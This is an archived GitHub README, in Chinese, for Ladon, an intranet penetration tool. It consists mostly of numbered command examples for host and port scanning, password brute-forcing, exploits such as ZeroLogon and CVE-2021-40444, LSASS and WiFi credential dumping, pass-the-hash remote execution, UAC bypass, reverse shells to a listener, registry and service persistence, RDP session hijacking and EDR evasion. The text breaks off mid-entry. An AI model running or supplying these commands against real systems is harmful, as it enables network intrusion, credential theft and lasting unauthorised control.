{ "id": "1141edcb-a4d3-4301-ab2f-475772e44d80", "created_at": "2026-04-06T00:21:51.651412Z", "updated_at": "2026-04-10T03:24:24.698191Z", "deleted_at": null, "sha1_hash": "4ecba9019983b7da86f5b669323b7cbe39e7cb1e", "title": "GitHub - k8gege/Ladon: Ladon大型内网渗透扫描器,PowerShell、Cobalt Strike插件、内存加载、无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描等。网络资产探测32种协议(ICMP\\NBT\\DNS\\MAC\\SMB\\WMI\\SSH\\HTTP\\HTTPS\\Exchange\\mssql\\FTP\\RDP)或方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等,大量高危漏洞检测模块MS17010、Zimbra、Exchange", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2522541, "plain_text": "GitHub - k8gege/Ladon: Ladon大型内网渗透扫描器,PowerShell、\r\nCobalt Strike插件、内存加载、无文件扫描。含端口扫描、服务识别、\r\n网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一\r\n键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、\r\n域名列表扫描等。网络资产探测32种协议\r\n(ICMP\\NBT\\DNS\\MAC\\SMB\\WMI\\SSH\\HTTP\\HTTPS\\Exchange\\mssql\\FTP\\R\r\n或方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、\r\n网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由\r\n器、交换机、数据库、打印机等,大量高危漏洞检测模块MS17010、\r\nZimbra、Exchange\r\nBy k8gege\r\nArchived: 2026-04-05 21:12:17 UTC\r\nAAuutthhoorr kk88ggeeggee\r\n Ladon 9 11 Ladon Bin iissssuueess 3355 ooppeenn Stars 5.3k Forks 895 lliicceennssee MIT\r\nRReelleeaassee DDoowwnnllooaadd 2 8 k\r\nhttps://github.com/k8gege/Ladon\r\nPage 1 of 41\n\n程序简介\r\nLadon大型内网渗透扫描器\\域渗透\\横向工具,PowerShell模块、Cobalt Strike插件、内存加载、无文件扫描。内含\r\n端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell,支持批\r\n量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描等。12.2版本内置262功能模块,网络资产探测模\r\n块30+协议(ICMP\\NBT\\DNS\\MAC\\SMB\\WMI\\SSH\\HTTP\\HTTPS\\Exchange\\mssql\\FTP\\RDP)以及方法快速获取目标网\r\n络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路\r\n由器、交换机、数据库、打印机等信息,高危漏洞检测16+包含Cisco、Zimbra、Exchange、DrayTek、MS17010、\r\nSMBGhost、Weblogic、ActiveMQ、Tomcat、Struts2系列、Printer等,密码审计25+含数据库(Mysql、Oracle、\r\nMSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、\r\nBasicAuth、Tomcat、Weblogic、Rar等,远程执行命令包含(smbexec/wmiexe/psexec/atexec/sshexec/webshell),Web指\r\n纹识别模块可识别135+(Web应用、中间件、脚本类型、页面类型)等,本地提权21+含\r\nSweetPotato\\BadPotato\\EfsPotato\\BypassUAC,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、\r\nPowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令,EXP生成器可一键生成漏洞\r\nPOC/EXP快速扩展扫描能力,Ladon支持Cobalt Strike插件化内存加载,无文件扫描内网快速进行横向移动。\r\nLadon下载\r\nhttps://github.com/k8gege/Ladon/releases\r\nhttps://k8gege.org/Download\r\n使用简单\r\n虽然Ladon功能丰富多样,但使用却非常简单,任何人都能轻易上手\r\n只需一或两个参数就可用90%的功能,一个模块相当于一个新工具\r\n运行环境\r\nWindows\r\nLadon可在安装有.net 2.0及以上版本Win系统中使用(Win7后系统自带.net)\r\n如Cmd、PowerShell、远控Cmd、WebShell等,以及Cobalt Strike内存加载使用\r\nLadon.ps1完美兼容Win7-Win11/2025 PowerShell,不看版本远程加载无文件渗透\r\n全平台LadonGo支持Linux、Mac、Arm、MIPS\r\nhttps://github.com/k8gege/Ladon\r\nPage 2 of 41\n\n全平台:Linux、MacOS、Windows、路由器、网络设备等OS系统\r\nhttps://github.com/k8gege/LadonGo\r\n奇葩条件\r\n实战并不那么顺利,有些内网转发后很卡或无法转发,只能将工具上传至目标\r\n有些马可能上传两三M的程序都要半天甚至根本传不了,PY的几十M就更别想了\r\nLadon采用C#研发,程序体积很小500K左右,即便马不行也能上传500K程序吧\r\n还不行也可PowerShell远程内存加载,这点是PY或GO编译的大程序无法比拟的\r\n宗旨\r\n一条龙服务,为用户提供一个简单易用、功能丰富、高度灵活的扫描工具\r\n特色\r\n扫描流量小\r\n程序体积小\r\n功能丰富强大\r\n程序简单易用\r\n插件支持多种语言\r\n跨平台(Win/Kali/Ubuntu)等\r\n支持Cobalt Strike插件化\r\n支持PowerShell无文件渗透\r\nExp生成器可一键生成Poc\r\n多版本适用各种环境\r\n程序参数功能\r\n1 支持指定IP扫描\r\n2 支持指定域名扫描\r\n3 支持指定机器名扫描\r\n4 支持指定C段扫描(ip/24)\r\n5 支持指定B段扫描(ip/16)\r\n6 支持指定A段扫描(ip/8)\r\n7 支持指定URL扫描\r\n8 支持批量IP扫描(ip.txt)\r\n9 支持批量C段扫描(ip24.txt)\r\n10 支持批量C段扫描(ipc.txt)\r\n11 支持批量B段扫描(ip16.txt)\r\n12 支持批量URL扫描(url.txt)\r\n13 支持批量域名扫描(domain.txt)\r\n14 支持批量机器名扫描(host.txt)\r\n15 支持批量国家段扫描(cidr.txt)\r\n16 支持批量字符串列表(str.txt)\r\n17 支持主机帐密列表(check.txt)\r\n18 支持用户密码列表(userpass.txt)\r\n19 支持指定范围C段扫描\r\n20 支持参数加载自定义DLL(仅限C#)\r\n21 支持参数加载自定义EXE(仅限C#)\r\n22 支持参数加载自定义INI配置文件\r\n23 支持参数加载自定义PowerShell\r\n24 支持自定义程序(系统命令或第三方程序即任意语言开发的程序或脚本)\r\nhttps://github.com/k8gege/Ladon\r\nPage 3 of 41\n\n25 插件(支持多种语言C#/Delphi/Golang/Python/VC/PowerShell)\r\n26 支持Cobalt Strike(beacon命令行下扫描目标内网或跳板扫描外网目标)\r\n27 支持CIDR格式IP扫描,如100.64.0.0/10,192.168.1.1/20等\r\n28 INI配置支持自定义程序密码爆破\r\n简明使用教程\r\nLadon 简明使用教程 完整文档: http://k8gege.org/Ladon\r\nExcel模块功能文档: http://k8gege.org/Ladon/wiki.xlsx\r\n支持Cmd、Cobalt Strike、PowerShell等内存加载\r\nWindows版本: .Net、Cobalt Strike、PowerShell\r\n全系统版本:GO(全平台)、Python(理论上全平台)\r\nPS: Study方便本地学习使用,完整功能请使用CMD\r\nBypassEDR扫描\r\n默认扫描速度很快,有些WAF或EDR防御很强\r\n设置几线程都有可能20分钟左右就不能扫了\r\nbypassEDR模拟人工访问,绕过速度检测策略\r\n扫描速度较慢,追求速度的愣头青不要使用\r\nLadon 10.1.2.8/24 MS17010 bypassEDR\r\n密码爆破相关模块暂不支持bypassEDR参数\r\n001 自定义线程扫描\r\n例子:扫描目标10.1.2段是否存在MS17010漏洞\r\n单线程:\r\nLadon 10.1.2.8/24 MS17010 t=1\r\n80线程:\r\nLadon noping 10.1.2.8/24 MS17010 t=80\r\n高强度防护下扫描线程设置低一些,F单线程\r\nLadon 10.1.2.8/24 MS17010 f=1\r\n002 Socks5代理扫描\r\n例子:使用8线程扫描目标10.1.2段是否存在MS17010漏洞\r\nLadon noping 10.1.2.8/24 MS17010 t=8\r\n详见:http://k8gege.org/Ladon/proxy.html\r\nPS:代理工具不支持Socks5,所以必须加noping参数扫描\r\n不管是Frp还是其它同类工具,最主要是Proxifier等工具不支持ICMP协议\r\n因为Ladon默认先用ICMP探测存活后,才使用对应模块测试\r\n所以代理环境下得禁ping扫描,系统ping使用的就是ICMP协议\r\nhttps://github.com/k8gege/Ladon\r\nPage 4 of 41\n\n003 网段扫描/批量扫描\r\nCIDR格式:不只是/24/16/8(所有)\r\nLadon 192.168.1.8/24 扫描模块\r\nLadon 192.168.1.8/16 扫描模块\r\nLadon 192.168.1.8/8 扫描模块\r\n字母格式:仅C段B段A段 顺序排序\r\nLadon 192.168.1.8/c 扫描模块\r\nLadon 192.168.1.8/b 扫描模块\r\nLadon 192.168.1.8/a 扫描模块\r\n0x004指定IP范围、网段扫描\r\nICMP探测1段50-200的存活主机\r\nLadon 192.168.1.50-192.168.1.200 ICMP\r\nICMP探测1.30至50.80存活主机\r\nLadon 192.168.1.30-192.168.50.80 ICMP\r\nTXT格式\r\n004 ICMP批量扫描C段列表存活主机\r\nLadon ip24.txt ICMP\r\nLadon ipc.txt ICMP\r\n005 ICMP批量扫描B段列表存活主机\r\nLadon ip16.txt ICMP\r\n006 ICMP批量扫描cidr列表(如某国IP段)\r\nLadon cidr.txt ICMP\r\n007 ICMP批量扫描域名是否存活\r\nLadon domain.txt ICMP\r\n008 ICMP批量扫描机器是否存活 使用主机名或机器名探测\r\nLadon host.txt ICMP\r\n009 WhatCMS批量识别CMS、Banner、SSL证书、标题,可识别未知CMS、路由器、打印机、网络设备、摄像头等\r\nhttps://github.com/k8gege/Ladon\r\nPage 5 of 41\n\nLadon 192.168.1.8 WhatCMS 扫描IP\nLadon 192.168.1.8/24 WhatCMS 扫描C段\nLadon 192.168.1.8/C WhatCMS 扫描C段\nLadon 192.168.1.8/B WhatCMS 扫描B段\nLadon 192.168.1.8/A WhatCMS 扫描A段\nLadon IP.TXT WhatCMS 扫描IP列表\nLadon IP24.TXT WhatCMS 扫描C段列表\nLadon IP16.TXT WhatCMS 扫描B段列表\nLadon cidr.TXT WhatCMS 扫描整个国家IP段列表\n禁PING扫描 \nLadon noping 192.168.1.8 WhatCMS 扫描IP\nLadon noping 192.168.1.8/24 WhatCMS 扫描C段\n010 批量检测DrayTek路由器版本、漏洞、弱口令\nLadon url.txt DraytekPoc\n011 批量解密Base64密码\nLadon str.txt DeBase64\n资产扫描、指纹识别、服务识别、存活主机、端口扫描\n012 ICMP扫描存活主机(最快)\nLadon 192.168.1.8/24 ICMP\nhttps://github.com/k8gege/Ladon\nPage 6 of 41\n\n013 Ping探测存活主机(调用系统Ping命令 回显ms、ttl等信息)\r\nLadon 192.168.1.8/24 Ping\r\n如果你认为ping命令通才是存活,可使用这条命令批量\r\n014 多协议探测存活主机 (IP、机器名、MAC/域名、制造商/系统版本)\r\nLadon 192.168.1.8/24 OnlinePC\r\n015 多协议识别操作系统 (IP、机器名、操作系统版本、开放服务)\r\nLadon 192.168.1.8/24 OsInfo\r\n016 OXID探测多网卡主机\r\nLadon 192.168.1.8/24 EthInfo\r\nLadon 192.168.1.8/24 OxidInfo\r\n017 DNS探测多网卡主机\r\nLadon 192.168.1.8/24 DnsInfo\r\n018 多协议扫描存活主机IP\r\nLadon 192.168.1.8/24 OnlineIP\r\n019 扫描SMB漏洞MS17010 (IP、机器名、漏洞编号、操作系统版本)\r\nLadon 192.168.1.8/24 MS17010\r\n020 SMBGhost漏洞检测 CVE-2020-0796 (IP、机器名、漏洞编号、操作系统版本)\r\nLadon 192.168.1.8/24 SMBGhost\r\n021 扫描Web标题 Banner 更全信息请使用WhatCMS模块探测\r\nLadon 192.168.1.8/24 WebInfo\r\nLadon http://192.168.1.8 WebInfo\r\nLadon 192.168.1.8/24 WebScan\r\nLadon http://192.168.1.8 WebScan\r\n022 扫描C段站点URL域名\r\nLadon 192.168.1.8/24 UrlScan\r\n023 扫描C段站点URL域名\r\nhttps://github.com/k8gege/Ladon\r\nPage 7 of 41\n\nLadon 192.168.1.8/24 SameWeb\r\n024 扫描子域名、二级域名\r\nLadon baidu.com SubDomain\r\n025 域名解析IP、主机名解析IP\r\nLadon baidu.com DomainIP\r\nLadon baidu.com HostIP\r\n025 批量域名解析IP、批量主机名解析IP\r\nLadon domain.txt DomainIP\r\nLadon host.txt HostIP\r\n025 批量域名、主机名解析 结果只有IP\r\nLadon domain.txt Domain2IP\r\nLadon host.txt Host2IP\r\n026 DNS查询域内机器、IP (条件域内,指定域控IP)\r\nLadon AdiDnsDump 192.168.1.8\r\n027 查询域内机器、IP (条件域内)\r\nLadon GetDomainIP\r\n028 扫描C段端口、指定端口扫描\r\nLadon 192.168.1.8/24 PortScan\r\nLadon 192.168.1.8 PortScan 80,445,3389\r\n029 扫描C段WEB及识别CMS(800+Web指纹识别)\r\nLadon 192.168.1.8/24 CMS\r\nLadon 192.168.1.8/24 CmsInfo\r\nLadon 192.168.1.8/24 WhatCMS\r\n030 扫描思科设备\r\nLadon 192.168.1.8/24 CiscoInfo\r\nLadon http://192.168.1.8 CiscoInfo\r\n031 枚举Mssql数据库主机 (数据库IP、机器名、SQL版本)\r\nhttps://github.com/k8gege/Ladon\r\nPage 8 of 41\n\nLadon EnumMssql\r\n032 枚举网络共享资源 (域、IP、主机名\\共享路径)\r\nLadon EnumShare\r\n033 扫描LDAP服务器(探测域控)\r\nLadon 192.168.1.8/24 LdapInfo\r\n034 扫描FTP服务器并识别版本\r\nLadon 192.168.1.8/24 FtpInfo\r\n暴力破解/网络认证/弱口令/密码爆破/数据库/网站后台/登陆口/系统登陆\r\n密码爆破详解参考SSH:http://k8gege.org/Ladon/sshscan.html\r\n035 445端口 SMB密码爆破(Windows)\r\nLadon 192.168.1.8/24 SmbScan\r\n036 135端口 Wmi密码爆破(Windowns)\r\nLadon 192.168.1.8/24 WmiScan\r\nhttps://github.com/k8gege/Ladon\r\nPage 9 of 41\n\n037 389端口 LDAP服务器、AD域密码爆破(Windows)\r\nLadon 192.168.1.8/24 LdapScan\r\n038 5985端口 Winrm密码爆破(Windowns)\r\nLadon 192.168.1.8/24 WinrmScan\r\n039 445端口 SMB NTLM HASH爆破(Windows)\r\nLadon 192.168.1.8/24 SmbHashScan\r\n040 135端口 Wmi NTLM HASH爆破(Windows)\r\nLadon 192.168.1.8/24 WmiHashScan\r\n041 22端口 SSH密码爆破(Linux)\r\nLadon 192.168.1.8/24 SshScan\r\nLadon 192.168.1.8:22 SshScan\r\n042 1433端口 Mssql数据库密码爆破\r\nLadon 192.168.1.8/24 MssqlScan\r\n043 1521端口 Oracle数据库密码爆破\r\nLadon 192.168.1.8/24 OracleScan\r\nOracle数据库比较特殊,只爆ORCL库会错过很多权限\r\n详见:http://k8gege.org/Ladon/OracleScan.html\r\n044 3306端口 Mysql数据库密码爆破\r\nLadon 192.168.1.8/24 MysqlScan\r\n045 7001端口 Weblogic后台密码爆破\r\nLadon http://192.168.1.8:7001/console WeblogicScan\r\nLadon 192.168.1.8/24 WeblogicScan\r\n046 5900端口 VNC远程桌面密码爆破\r\nLadon 192.168.1.8/24 VncScan\r\n047 21端口 Ftp服务器密码爆破\r\nhttps://github.com/k8gege/Ladon\r\nPage 10 of 41\n\nLadon 192.168.1.8/24 FtpScan\r\n048 8080端口 Tomcat后台登陆密码爆破\r\nLadon 192.168.1.8/24 TomcatScan\r\nLadon http://192.168.1.8:8080/manage TomcatScan\r\n049 Web端口 401基础认证密码爆破\r\nLadon http://192.168.1.8/login HttpBasicScan\r\nLadon ip.txt 401Scan\r\n052 139端口Netbios协议Windows密码爆破\r\nLadon 192.168.1.8/24 NbtScan\r\n053 5985端口Winrm协议Windows密码爆破\r\nLadon 192.168.1.8/24 WinrmScan\r\n054 网络摄像头密码爆破(内置默认密码)\r\nLadon 192.168.1.8/24 DvrScan\r\n漏洞检测/Poc\r\n055 SMB漏洞检测(CVE-2017-0143/CVE-2017-0144)\r\nLadon 192.168.1.8/24 MS17010\r\nhttps://github.com/k8gege/Ladon\r\nPage 11 of 41\n\n056 SMBGhost漏洞检测 CVE-2020-0796 911保留\r\nLadon 192.168.1.8/24 SMBGhost\r\n057 Weblogic漏洞检测(CVE-2019-2725/CVE-2018-2894)\r\nLadon 192.168.1.8/24 WeblogicPoc\r\n058 PhpStudy后门检测(phpstudy 2016/phpstudy 2018) 10.9移除 911保留\r\nLadon 192.168.1.8/24 PhpStudyPoc\r\n059 ActiveMQ漏洞检测(CVE-2016-3088)\r\nLadon 192.168.1.8/24 ActivemqPoc\r\n060 Tomcat漏洞检测(CVE-2017-12615)\r\nLadon 192.168.1.8/24 TomcatPoc\r\n061 Struts2漏洞检测(S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode/S2-045/S2-037)\r\nLadon 192.168.1.8/24 Struts2Poc\r\n062 DraytekPoc CVE-2020-8515漏洞检测、Draytek版本探测、弱口令检测\r\nLadon 192.168.1.8 DraytekPoc\r\nLadon 192.168.1.8/24 DraytekPoc\r\nFortiGate CVE-2024-55591 未授权RCE漏洞检测\r\nLadon 192.168.1.8/24 CVE-2024-55591\r\n漏洞利用/Exploit\r\nhttps://github.com/k8gege/Ladon\r\nPage 12 of 41\n\n063 Weblogic漏洞利用(CVE-2019-2725)\r\nLadon 192.168.1.8/24 WeblogicExp\r\n064 Tomcat漏洞利用(CVE-2017-12615)\r\nLadon 192.168.1.8/24 TomcatExp\r\n065 Windows 0day漏洞通用DLL注入执行CMD生成器(DLL仅5KB)\r\nLadon CmdDll x86 calc\r\nLadon CmdDll x64 calc\r\nLadon CmdDll b64x86 YwBhAGwAYwA=\r\nLadon CmdDll b64x64 YwBhAGwAYwA=\r\n066 CVE-2021-40444 微软IE/Office 0day漏洞\r\nLadon CVE-2021-40444 MakeCab poc.dll\r\nLadon CVE-2021-40444 MakeHtml http://192.168.1.8\r\n067 DraytekExp CVE-2020-8515远程执行命令EXP\r\nLadon DraytekExp http://192.168.1.8 whoami\r\n068 域渗透 ZeroLogon CVE-2020-1472域控提权(密码置空)\r\nLadon ZeroLogon dc.k8gege.org\r\n069 CVE-2020-0688 Exchange序列化漏洞(.net 4.0)\r\nhttps://github.com/k8gege/Ladon\r\nPage 13 of 41\n\nLadon cve-2020-0688 192.168.1.142 Administrator K8gege520\n070 ForExec循环漏洞利用(Win10永恒之黑CVE-2020-0796,成功退出以免目标蓝屏)\nLadon ForExec \"CVE-2020-0796-Exp -i 192.168.1.8 -p 445 -e --load-shellcode test.txt\" 80 \"Exploit finnished\"\n文件下载、文件传输\n071 内网文件传输 HTTP下载 HTTPS下载 MSF下载\nLadon wget https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe \nLadon HttpDownLoad http://k8gege.org/Download/Ladon.rar\n072 内网文件传输 Ftp下载\nLadon FtpDownLoad 127.0.0.1:21 admin admin test.exe\n加密解密(HEX/Base64)\n073 Hex加密解密\nLadon 123456 EnHex\nLadon 313233343536 DeHex\n074 Base64加密解密\nLadon 123456 EnBase64\nLadon MTIzNDU2 DeBase64\nLadon str.txt DeBase64\n网络嗅探\n075 Ftp密码嗅探(绑定本机IP,自动嗅探C段)\n多网卡机器,嗅探对应C段IP\nLadon FtpSniffer 192.168.1.5\n076 HTTP密码嗅探(绑定本机IP,自动嗅探C段)\n多网卡机器,嗅探对应C段IP\nLadon HTTPSniffer 192.168.1.5\n077 网络嗅探\nLadon Sniffer\nhttps://github.com/k8gege/Ladon\nPage 14 of 41\n\n密码读取\r\n078 读取IIS站点密码、网站路径\r\nLadon IISpwd\r\n079 读取连接过的WIFI密码\r\nLadon WifiPwd\r\n080 读取FileZilla FTP密码\r\nLadon FileZillaPwd\r\n081 读取系统Hash、VPN密码、DPAPI-Key 10.9移除\r\nLadon CVE-2021-36934\r\n082 DumpLsass内存密码(mimikatz明文) 限9.1.1版本之前\r\nLadon DumpLsass\r\n信息收集\r\n083 API查看当前用户\r\nLadon w\r\nLadon whoami\r\n083 获取本机内网IP与外网IP\r\nhttps://github.com/k8gege/Ladon\r\nPage 15 of 41\n\nLadon GetIP\r\nLadon IPinfo\r\n084 获取PCname GUID CPUID DiskID Mac地址\r\nLadon GetID\r\n085 查看用户最近访问文件\r\nLadon Recent\r\n086 U盘、USB使用记录查看(USB名称、USB标记、路径信息)\r\nLadon UsbLog\r\n087 检测后门(注册表启动项、DLL劫持)\r\nLadon CheckDoor\r\nLadon AutoRun\r\n088 进程详细信息(程序路径、位数、启动参数、用户)\r\nLadon EnumProcess\r\nLadon Tasklist\r\n089 获取命令行参数\r\nLadon cmdline\r\nLadon cmdline cmd.exe\r\n090 获取渗透基础信息\r\nLadon GetInfo\r\nLadon GetInfo2\r\n091 .NET \u0026 PowerShell版本\r\nLadon NetVer\r\nLadon PSver\r\nLadon NetVersion\r\nLadon PSversion\r\n092 运行时版本\u0026编译环境\r\nLadon Ver\r\nLadon Version\r\nhttps://github.com/k8gege/Ladon\r\nPage 16 of 41\n\n093 运行时版本\u0026编译环境\u0026安装软件列表\r\nLadon AllVer\r\nLadon AllVersion\r\n094 查看IE代理信息\r\nLadon QueryProxy\r\n095 DirList列目录+基础渗透信息\r\n默认列全盘\r\nLadon DirList\r\n指定盘符或目录\r\nLadon DirList c:\\\r\n096 QueryAdmin查看管理员用户\r\nLadon QueryAdmin\r\n097 查看本机命名管道\r\nLadon GetPipe\r\n098 RdpLog查看3389连接记录\r\nLadon RdpLog\r\n远程执行(psexec/wmiexec/atexec/sshexec/smbexec)\r\nhttps://github.com/k8gege/Ladon\r\nPage 17 of 41\n\n099 445端口 加密PSEXEC远程执行命令(交互式)\r\nnet use \\\\192.168.1.8 k8gege520 /user:k8gege\r\nLadon psexec 192.168.1.8\r\npsexec\u003e whoami\r\nnt authority\\system\r\n100 135端口 WmiExec远程执行命令 (非交互式)\r\nLadon wmiexec 192.168.1.8 k8gege k8gege520 cmd whoami\r\nLadon wmiexec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p\r\n101 445端口 AtExec远程执行命令(非交互式)\r\nLadon AtExec 192.168.1.8 k8gege k8gege520 whoami\r\n102 22端口 SshExec远程执行命令(非交互式)\r\nLadon SshExec 192.168.1.8 k8gege k8gege520 whoami\r\nLadon SshExec 192.168.1.8 22 k8gege k8gege520 whoami\r\n103 JspShell远程执行命令(非交互式)9.3.0移除\r\nUsage:Ladon JspShell type url pwd cmd\r\nLadon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami\r\n104 WebShell远程执行命令(非交互式)9.3.0移除\r\nhttps://github.com/k8gege/Ladon\r\nPage 18 of 41\n\nUsage:Ladon WebShell ScriptType ShellType url pwd cmd\r\nExample: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami\r\nExample: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami\r\nExample: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami\r\nExample: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon whoami\r\n获取系统版本信息 方便提权\r\nExample: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon OSinfo\r\n105 135端口 WmiExec2远程执行命令支持HASH (非交互式)支持文件上传\r\nLadon WmiExec2 host user pass cmd whoami\r\nLadon WmiExec2 pth host cmd whoami 先Mimikatz注入Hash,再pth执行命令\r\nBase64Cmd for Cobalt Strike\r\nLadon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA\r\nLadon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA\r\nUpload:\r\nLadon WmiExec2 host user pass upload beacon.exe ceacon.exe\r\nLadon WmiExec2 pth host upload beacon.exe ceacon.exe 先Mimikatz注入Hash,再pth执行命令\r\n106 445端口 SmbExec Ntlm-Hash非交互式远程执行命令(无回显)\r\nLadon SmbExec 192.168.1.8 k8gege k8gege520 cmd whoami\r\nLadon SmbExec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p\r\n107 WinrmExec远程执行命令无回显(支持System权限)\r\nLadon WinrmExec 192.168.1.8 5985 k8gege.org Administrator K8gege520 calc.exe\r\n提权降权\r\nhttps://github.com/k8gege/Ladon\r\nPage 19 of 41\n\n108 whoami查看当前用户权限以及特权\r\nLadon whoami\r\n109 6种白名单BypassUAC(8.0后)Win7-Win10 10.8版本移除 仅911保留\r\n用法: Ladon BypassUAC Method Base64Cmd\r\nLadon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl\r\nLadon BypassUAC fodhelper Y21kIC9jIHN0YXJ0IGNhbGMuZXhl\r\nLadon BypassUAC computerdefaults Y21kIC9jIHN0YXJ0IGNhbGMuZXhl\r\nLadon BypassUAC sdclt Y21kIC9jIHN0YXJ0IGNhbGMuZXhl\r\nLadon BypassUAC slui Y21kIC9jIHN0YXJ0IGNhbGMuZXhl\r\nLadon BypassUAC dikcleanup Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ==\r\n110 BypassUac2 绕过UAC执行,支持Win7-Win10 10.8版本移除 仅911保留\r\nLadon BypassUac2 c:\\1.exe\r\nLadon BypassUac2 c:\\1.bat\r\n111 PrintNightmare (CVE-2021-1675 | CVE-2021-34527)打印机漏洞提权EXP\r\nLadon PrintNightmare c:\\evil.dll\r\nLadon CVE-2021-1675 c:\\evil.dll\r\n112 CVE-2022-21999 SpoolFool打印机漏洞提权EXP\r\nhttps://github.com/k8gege/Ladon\r\nPage 20 of 41\n\nLadon SpoolFool poc.dll\r\nLadon CVE-2022-21999 poc.dll\r\n113 GetSystem 提权System权限执行CMD\r\nLadon GetSystem cmd.exe\r\n114 复制令牌执行CMD(如system权限降权exploer当前用户)\r\nLadon GetSystem cmd.exe explorer\r\n115 Runas 模拟用户执行命令\r\nLadon Runas user pass cmd\r\n116 MS16135提权至SYSTEM\r\nLadon ms16135 whoami \u003e=9.2.1版本移除 911保留\r\n117 BadPotato服务用户提权至SYSTEM\r\nLadon BadPotato cmdline\r\n118 SweetPotato服务用户提权至SYSTEM\r\nLadon SweetPotato cmdline\r\n119 EfsPotato Win7-2019提权(服务用户权限提到system)\r\nLadon EfsPotato whoami\r\n120 Open3389一键开启3389\r\nLadon Open3389\r\n121 激活内置管理员Administrator\r\nLadon ActiveAdmin\r\n122 激活内置用户Guest\r\nLadon ActiveGuest\r\n反弹Shell\r\n123 反弹TCP NC Shell\r\nhttps://github.com/k8gege/Ladon\r\nPage 21 of 41\n\nLadon ReverseTcp 192.168.1.8 4444 nc\r\n124 反弹TCP MSF Shell\r\nLadon ReverseTcp 192.168.1.8 4444 shell\r\n125 反弹TCP MSF MET Shell\r\nLadon ReverseTcp 192.168.1.8 4444 meter\r\n126 反弹HTTP MSF MET Shell\r\nLadon ReverseHttp 192.168.1.8 4444\r\n127 反弹HTTPS MSF MET Shell\r\nLadon ReverseHttps 192.168.1.8 4444\r\n128 反弹TCP CMD \u0026 PowerShell Shell\r\nLadon PowerCat 192.168.1.8 4444 cmd\r\nLadon PowerCat 192.168.1.8 4444 psh\r\n129 反弹UDP Cmd \u0026 PowerShell Shell\r\nLadon PowerCat 192.168.1.8 4444 cmd udp\r\nLadon PowerCat 192.168.1.8 4444 psh udp\r\n130 netsh本机888端口转发至112的22端口\r\nLadon netsh add 888 192.168.1.112 22\r\n131 PortTran端口转发(3389例子)\r\nVPS监听: Ladon PortTran 8000 338\r\n目标转发: Ladon PortTran 内网IP 3389 VPS_IP 8000\r\n本机连接: mstsc VPS_IP:338\r\n本机执行\r\n132 RDP桌面会话劫持(无需密码)\r\nLadon RdpHijack 3\r\nLadon RdpHijack 3 console\r\n133 添加注册表Run启动项\r\nhttps://github.com/k8gege/Ladon\r\nPage 22 of 41\n\nLadon RegAuto Test c:\\123.exe\r\n134 AT计划执行程序(无需时间)(system权限)\r\nLadon at c:\\123.exe\r\nLadon at c:\\123.exe gui\r\n135 SC服务加启动项\u0026执行程序(system权限)\r\nLadon sc c:\\123.exe\r\nLadon sc c:\\123.exe gui\r\nLadon sc c:\\123.exe auto ServerName\r\n系统信息探测\r\n136 Snmp协议探测操作系统、设备等信息\r\nLadon 192.168.1.8/24 SnmpInfo\r\n137 Nbt协议探测Windows主机名、域、用户\r\nLadon 192.168.1.8/24 NbtInfo\r\n138 Smb协议探测Windows版本、主机名、域\r\nLadon 192.168.1.8/24 SmbInfo\r\n139 Wmi协议探测Windows版本、主机名、域\r\nLadon 192.168.1.8/24 WmiInfo\r\n140 Mssql协议探测Windows版本、主机名、域\r\nLadon 192.168.1.8/24 MssqlInfo\r\n141 Winrm协议探测Windows版本、主机名、域\r\nLadon 192.168.1.8/24 WinrmInfo\r\n142 Exchange探测Windows版本、主机名、域\r\nLadon 192.168.1.8/24 ExchangeInfo\r\n143 Rdp协议探测Windows版本、主机名、域\r\nhttps://github.com/k8gege/Ladon\r\nPage 23 of 41\n\nLadon 192.168.1.8/24 RdpInfo\r\n其它功能\r\n144 Win2008一键启用.net 3.5\r\nLadon EnableDotNet\r\n145 获取内网站点HTML源码\r\nLadon gethtml http://192.168.1.1\r\n146 一键迷你WEB服务器 渗透监听专用WEB服务器\r\nLadon web 80\r\nLadon web 80 dir\r\n获取外网IP(VPS上启动WEB,目标访问ip.txt或ip.jpg) http://192.168.1.8/ip.txt\r\n147 getstr/getb64/debase64/savetxt(无回显漏洞回显结果)\r\n监听\r\nLadon web 800\r\n提交 返回明文\r\ncertutil.exe -urlcache -split -f http://192.168.1.8:800/getstr/test123456\r\nBase64加密结果\r\ncertutil.exe -urlcache -split -f http://192.168.1.110:800/getbase64/k8gege520\r\nBase64结果解密\r\ncertutil.exe -urlcache -split -fhttp://192.168.1.110:800/debase64/azhnZWdlNTIw\r\n148 Shiro插件探测\r\nLadon 192.168.1.8/24 IsShiro\r\n149 LogDelTomcat 